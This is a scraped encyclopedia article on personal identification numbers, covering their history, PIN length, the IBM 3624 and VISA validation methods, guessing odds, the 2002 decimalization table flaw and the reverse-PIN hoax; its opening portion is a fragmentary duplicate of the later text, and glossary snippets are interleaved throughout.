Personal identification number
Encyclopedia
A personal identification number (PIN, pronounced "pin") is a secret numeric password
shared between a user and a system that can be used to authenticate the user to the system. Typically, the user is required to provide a non-confidential user identifier or token (the user ID) and a confidential PIN to gain access to the system. Upon receiving the user ID and PIN, the system looks up the PIN based upon the user ID and compares the looked-up PIN with the received PIN. The user is granted access only when the number entered matches with the number stored in the system. Hence, despite the name, a PIN does not personally identify the user.
PINs are most often used for automated teller machine
s (ATMs) but are increasingly used at the point of sale
, for debit card
s and credit card
s. Throughout Europe and Canada the traditional in-store credit card signing process is increasingly being replaced with a system in which the customer is asked to enter their PIN instead of signing. In the UK and Ireland this goes under the term 'Chip and PIN
', since PINs were introduced at the same time as EMV
chips on the cards. In other parts of the world, PINs have been used before the introduction of EMV. Apart from financial uses, GSM mobile phones usually allow the user to enter a PIN of between four and eight digits. The PIN is recorded in the SIM card.
In 2006, James Goodfellow
, the inventor of the personal identification number, was awarded an OBE in the Queen's Birthday Honours List.
. One day in 1967, while thinking about more efficient ways banks could disburse cash to their customers, it occurred to him that the vending machine
model was a proven fit. For authentication
Shepherd-Barron at first envisioned a six-digit numeric code, given what he could reliably remember. His wife however preferred four digits, which became the most commonly used length.
ISO 9564
-1, the international standard for PIN management and security, allows for PINs from four up to twelve digits, but also notes that "For usability reasons, an assigned numeric PIN should not exceed six digits in length."
(HSM).
(PAN), using an encryption key generated specifically for the purpose. This key is sometimes referred to as the PIN generation key (PGK). This PIN is directly related to the primary account number. To validate the PIN, the issuing bank regenerates the PIN using the above method, and compares this with the entered PIN.
Natural PINs can not be user selectable because they are derived from the PAN. If the card is reissued with a new PAN, a new PIN must be generated.
Natural PINs allow banks to issue PIN reminder letters as the PIN can be generated.
The offset can be stored either on the card track data, or in a database at the card issuer.
To validate the PIN, the issuing bank calculates the natural PIN as in the above method, then adds the offset and compares this value to the entered PIN.
The VISA method takes the rightmost eleven digits of the PAN excluding the checksum value, a PIN validation key index (PVKI, chosen from one to six) and the required PIN value to make a 64 bit number, the PVKI selects a validation key (PVK, of 128 bits) to encrypt this number. From this encrypted value, the PVV is found.
To validate the PIN, the issuing bank calculates a PVV value from the entered PIN and PAN and compares this value to the reference PVV. If the reference PVV and the calculated PVV match, the correct PIN was entered.
Unlike the IBM method, the VISA method doesn't derive a PIN. The PVV value is used to confirm the PIN entered at the terminal, was also used to generate the reference PVV. The PIN used to generate a PVV can be randomly generated or user selected or even derived using the IBM method.
is a notable exception with six digit pins being given by default. However, some banks do not give out numbers where all digits are identical (such as 1111, 2222, ...), consecutive (1234, 2345, ...), numbers that start with one or more zeroes, or the last four digits of your social security number
. Many PIN verification systems allow three attempts, thereby giving a card thief a 0.06% probability
of guessing the correct PIN before the card is blocked. This holds only if all PINs are equally likely and the attacker has no further information available, which has not been the case with some of the many PIN generation and verification algorithms that banks and ATM manufacturers have used in the past.
In 2002 two PhD students at Cambridge University
, Piotr Zieliński and Mike Bond, discovered a security flaw in the PIN generation system of the IBM 3624
, which was duplicated in most later hardware. Known as the decimalization table attack
, the flaw would allow someone who has access to a bank's computer system to determine the PIN for an ATM card in an average of 15 guesses.
If a mobile phone PIN is entered incorrectly three times, the SIM card is blocked until a Personal Unblocking Code
(PUC or PUK), provided by the service operator, is entered. If the PUC is entered incorrectly ten times, the SIM card is permanently blocked, requiring a new SIM card.
Safety practices for PIN:
(Redundant Acronym Syndrome syndrome).
Password
A password is a secret word or string of characters that is used for authentication, to prove identity or gain access to a resource . The password should be kept secret from those not allowed access....
shared between a user and a system that can be used to authenticate the user to the system. Typically, the user is required to provide a non-confidential user identifier or token (the user ID) and a confidential PIN to gain access to the system. Upon receiving the user ID and PIN, the system looks up the PIN based upon the user ID and compares the looked-up PIN with the received PIN. The user is granted access only when the number entered matches with the number stored in the system. Hence, despite the name, a PIN does not personally identify the user.
PINs are most often used for automated teller machine
Automated teller machine
An automated teller machine or automatic teller machine, also known as a Cashpoint , cash machine or sometimes a hole in the wall in British English, is a computerised telecommunications device that provides the clients of a financial institution with access to financial transactions in a public...
s (ATMs) but are increasingly used at the point of sale
Point of sale
Point of sale or checkout is the location where a transaction occurs...
, for debit card
Debit card
A debit card is a plastic card that provides the cardholder electronic access to his or her bank account/s at a financial institution...
s and credit card
Credit card
A credit card is a small plastic card issued to users as a system of payment. It allows its holder to buy goods and services based on the holder's promise to pay for these goods and services...
s. Throughout Europe and Canada the traditional in-store credit card signing process is increasingly being replaced with a system in which the customer is asked to enter their PIN instead of signing. In the UK and Ireland this goes under the term 'Chip and PIN
Chip and PIN
Chip and PIN is the brandname adopted by the banking industries in the United Kingdom and Ireland for the rollout of the EMV smartcard payment system for credit, debit and ATM cards.- History :...
', since PINs were introduced at the same time as EMV
EMV
EMV stands for Europay, MasterCard and VISA, a global standard for inter-operation of integrated circuit cards and IC card capable point of sale terminals and automated teller machines , for authenticating credit and debit card transactions.It is a joint effort between Europay, MasterCard and...
chips on the cards. In other parts of the world, PINs have been used before the introduction of EMV. Apart from financial uses, GSM mobile phones usually allow the user to enter a PIN of between four and eight digits. The PIN is recorded in the SIM card.
In 2006, James Goodfellow
James Goodfellow
James Goodfellow OBE is a Scottish inventor. He patented Personal Identification Number technology, and is widely acknowledged as the inventor of Automatic Teller Machine technology, although John Shepherd-Barron also had a large part to play in their development.He was a development engineer...
, the inventor of the personal identification number, was awarded an OBE in the Queen's Birthday Honours List.
PIN length
The concept of a PIN originates with the inventor of the ATM, John Shepherd-BarronJohn Shepherd-Barron
John Adrian Shepherd-Barron, OBE was a Scottish inventor, who pioneered the development of the cash machine, sometimes referred to as the Automated Teller Machine or ATM.-Early life:...
. One day in 1967, while thinking about more efficient ways banks could disburse cash to their customers, it occurred to him that the vending machine
Vending machine
A vending machine is a machine which dispenses items such as snacks, beverages, alcohol, cigarettes, lottery tickets, consumer products and even gold and gems to customers automatically, after the customer inserts currency or credit into the machine....
model was a proven fit. For authentication
Authentication
Authentication is the act of confirming the truth of an attribute of a datum or entity...
Shepherd-Barron at first envisioned a six-digit numeric code, given what he could reliably remember. His wife however preferred four digits, which became the most commonly used length.
ISO 9564
ISO 9564
ISO 9564 is an international standard for personal identification number management and security in retail banking.The PIN is used to verify the identity of a customer within an electronic funds transfer system, and to authorise the transfer of funds, so it is important to protect it against...
-1, the international standard for PIN management and security, allows for PINs from four up to twelve digits, but also notes that "For usability reasons, an assigned numeric PIN should not exceed six digits in length."
PIN validation
There are several main methods of validating PINs. The operations discussed below are usually performed within a hardware security moduleHardware Security Module
A hardware security module is a type of secure cryptoprocessor targeted at managing digital keys, accelerating cryptoprocesses in terms of digital signings/second and for providing strong authentication to access critical keys for server applications...
(HSM).
IBM 3624
The IBM method is used to generate what is termed a natural PIN. The natural PIN is generated by encrypting the primary account numberBank card number
A bank card number is the primary account number found on credit cards and bank cards. It has a certain amount of internal structure and shares a common numbering scheme. Credit card numbers are a special case of ISO/IEC 7812 bank card numbers....
(PAN), using an encryption key generated specifically for the purpose. This key is sometimes referred to as the PIN generation key (PGK). This PIN is directly related to the primary account number. To validate the PIN, the issuing bank regenerates the PIN using the above method, and compares this with the entered PIN.
Natural PINs can not be user selectable because they are derived from the PAN. If the card is reissued with a new PAN, a new PIN must be generated.
Natural PINs allow banks to issue PIN reminder letters as the PIN can be generated.
IBM 3624 + offset
To allow user selectable PINs it is possible to store a PIN offset value. The Offset is found by subtracting natural PIN from the customer selected PIN using modulo 10. For example, if the natural PIN is 1234, and the user wishes to have a PIN of 2345, the offset is 1111.The offset can be stored either on the card track data, or in a database at the card issuer.
To validate the PIN, the issuing bank calculates the natural PIN as in the above method, then adds the offset and compares this value to the entered PIN.
VISA method
The VISA method is used by many card schemes and is not VISA-specific. The VISA method generates a PIN verification value (PVV). Similar to the offset value, it can be stored on the card's track data, or in a database at the card issuer. This is called the reference PVV.The VISA method takes the rightmost eleven digits of the PAN excluding the checksum value, a PIN validation key index (PVKI, chosen from one to six) and the required PIN value to make a 64 bit number, the PVKI selects a validation key (PVK, of 128 bits) to encrypt this number. From this encrypted value, the PVV is found.
To validate the PIN, the issuing bank calculates a PVV value from the entered PIN and PAN and compares this value to the reference PVV. If the reference PVV and the calculated PVV match, the correct PIN was entered.
Unlike the IBM method, the VISA method doesn't derive a PIN. The PVV value is used to confirm the PIN entered at the terminal, was also used to generate the reference PVV. The PIN used to generate a PVV can be randomly generated or user selected or even derived using the IBM method.
PIN security
Financial PINs are often four-digit numbers in the range 0000-9999, resulting in 10,000 possible numbers. SwitzerlandSwitzerland
Switzerland name of one of the Swiss cantons. ; ; ; or ), in its full name the Swiss Confederation , is a federal republic consisting of 26 cantons, with Bern as the seat of the federal authorities. The country is situated in Western Europe,Or Central Europe depending on the definition....
is a notable exception with six digit pins being given by default. However, some banks do not give out numbers where all digits are identical (such as 1111, 2222, ...), consecutive (1234, 2345, ...), numbers that start with one or more zeroes, or the last four digits of your social security number
Social Security number
In the United States, a Social Security number is a nine-digit number issued to U.S. citizens, permanent residents, and temporary residents under section 205 of the Social Security Act, codified as . The number is issued to an individual by the Social Security Administration, an independent...
. Many PIN verification systems allow three attempts, thereby giving a card thief a 0.06% probability
Probability
Probability is ordinarily used to describe an attitude of mind towards some proposition of whose truth we arenot certain. The proposition of interest is usually of the form "Will a specific event occur?" The attitude of mind is of the form "How certain are we that the event will occur?" The...
of guessing the correct PIN before the card is blocked. This holds only if all PINs are equally likely and the attacker has no further information available, which has not been the case with some of the many PIN generation and verification algorithms that banks and ATM manufacturers have used in the past.
In 2002 two PhD students at Cambridge University
University of Cambridge
The University of Cambridge is a public research university located in Cambridge, United Kingdom. It is the second-oldest university in both the United Kingdom and the English-speaking world , and the seventh-oldest globally...
, Piotr Zieliński and Mike Bond, discovered a security flaw in the PIN generation system of the IBM 3624
IBM 3624
A successor to the IBM 3614, the IBM 3624 was a late 1970s second-generation Automatic teller machine that was designed at the IBM Los Gatos lab. IBM 3624 units, along with the later IBM 4732, were manufactured at IBM facilities in Charlotte, North Carolina and Havant, England until all operations...
, which was duplicated in most later hardware. Known as the decimalization table attack
Decimalization table attack
A decimalization table attack is a technique that may allow a corrupt insider at a bank to discover Personal Identification Numbers by exploiting a design flaw in the Hardware Security Module used to protect the PIN....
, the flaw would allow someone who has access to a bank's computer system to determine the PIN for an ATM card in an average of 15 guesses.
If a mobile phone PIN is entered incorrectly three times, the SIM card is blocked until a Personal Unblocking Code
Personal Unblocking Code
A PIN Unlock Code , also known as a PIN Unlock Key , is used in GSM mobile phones and some smartcards to unblock a blocked card.Most mobile telephones offer the feature of personal identification number protection...
(PUC or PUK), provided by the service operator, is entered. If the PUC is entered incorrectly ten times, the SIM card is permanently blocked, requiring a new SIM card.
Safety practices for PIN:
- Limit PIN usage.
- Use the link key instead of the PIN.
- Use inside secure environments.
"PIN number"
The term "PIN number" (hence "personal identification number number") is commonly used. This is an example of RAS syndromeRAS syndrome
RAS syndrome , also known as PNS syndrome or RAP phrases , refers to the use of one or more of the words that make up an acronym or initialism in conjunction with the abbreviated form, thus in effect repeating one or more words...
(Redundant Acronym Syndrome syndrome).
Reverse PIN hoax
Rumours have been in e-mail circulation claiming that in the event of entering a PIN into an ATM backwards, police will be instantly alerted as well as money being ordinarily issued as if the PIN had been entered correctly. The intention of this scheme would be to protect victims of muggings; however, despite the system being proposed for use in some US states, there are no ATMs currently in existence that employ this software.Related pages
- ATM SafetyPIN softwareATM SafetyPIN softwareATM SafetyPIN software is a software application that would allow users of automated teller machines to alert the police of a forced cash withdrawal by entering their personal identification number in reverse order. The system was invented and patented by Illinois lawyer Joseph Zingher...
- ISO 9564ISO 9564ISO 9564 is an international standard for personal identification number management and security in retail banking.The PIN is used to verify the identity of a customer within an electronic funds transfer system, and to authorise the transfer of funds, so it is important to protect it against...
, international standard for PIN management and security in retail banking - Personal Unblocking CodePersonal Unblocking CodeA PIN Unlock Code , also known as a PIN Unlock Key , is used in GSM mobile phones and some smartcards to unblock a blocked card.Most mobile telephones offer the feature of personal identification number protection...
- PIN pad
- Point of sales
- Transaction authentication numberTransaction authentication numberA Transaction authentication number, TAN or T.A.N. is used by some online banking services as a form of single use one-time passwords to authorize financial transactions...